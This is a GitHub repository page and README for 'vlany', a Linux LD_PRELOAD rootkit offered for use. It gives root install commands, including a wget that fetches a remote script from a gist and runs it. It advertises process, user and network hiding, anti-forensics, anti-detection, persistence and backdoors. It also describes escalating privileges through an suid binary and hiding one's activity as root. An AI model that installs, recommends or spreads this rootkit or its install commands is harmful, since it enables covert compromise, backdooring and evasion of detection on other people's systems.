Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)
Switch branches/tags
Nothing to show
Clone or download
Latest commit 31b557c Aug 25, 2017

README.md

vlany (wiki)

vlany is a Linux LD_PRELOAD rootkit.

Installing

  • vlany's quick_install.sh script is the fastest/easiest method of installation.
    root@vlany:~# wget https://gist.githubusercontent.com/mempodippy/d93fd99164bace9e63752afb791a896b/raw/6b06d235beac8590f56c47b7f46e2e4fac9cf584/quick_install.sh -O /tmp/quick_install.sh && chmod +x /tmp/quick_install.sh && /tmp/quick_install.sh

    The quick_install.sh script automatically downloads the latest version of vlany from this repository, untars the archive, then executes the regular installation script from a new random directory in /tmp/. By default, the quick_install.sh script removes the new directory once execution has completely finished.

  • It's very simple to install vlany onto a sytem as it comes with an automated install script.
    To install vlany you want to first download it from our GitHub ( Always up to date and trusted )
    root@vlany:~# wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar xvpfz master.tar.gz

  • Once it's downloaded you just have to run install.sh inside vlany-master.
    root@vlany:~# cd vlany-master && ./install.sh
    By default this will prompt you with a tui installation but if cli is prefered you can use the --cli argument to invoke a similar cli installation.

ASCIICAST OF INSTALLATION

Regular tui installation on a Debian 8 box using an suid binary to escalate privileges from a tmp user. In a real life scenario, you'll want to play with some environment variables to prevent anyone from seeing your activity when root.

Downloads

quick_install.sh
vlany.tar.gz
populated const.h (after config.py execution)

Features

  • Process hiding
  • User hiding
  • Network hiding
  • LXC container
  • Anti-Debug
  • Anti-Forensics
  • Persistent (re)installation & Anti-Detection
  • Dynamic linker modifications
  • Backdoors
  • vlany-exclusive commands

Known bugs

Any bugs listed here will be present until a resolve has been reached. If a bug has been reported as an issue, the corresponding issue will also be linked in the bug listing. Should a bug be resolved, the listing will be removed from here, and if any issue is still open pertaining to the bug, it will be closed.

Serious bugs

  1. There is currently an experimental reboot brick fix. Some systems will brick, others won't. Please report any systems that brick on reboot as an issue, and give the circumstances of the vlany installation in the report. Take a look at the Issues page to see if a similar issue has already been submitted.
  2. vlany fails to install correctly on anything above CentOS 6.6.

In-depth README.txt (very detailed but not maintained)

NOTE: vlany is in active development. Changes are constantly being made to this repository, so beware that vlany is very experimental.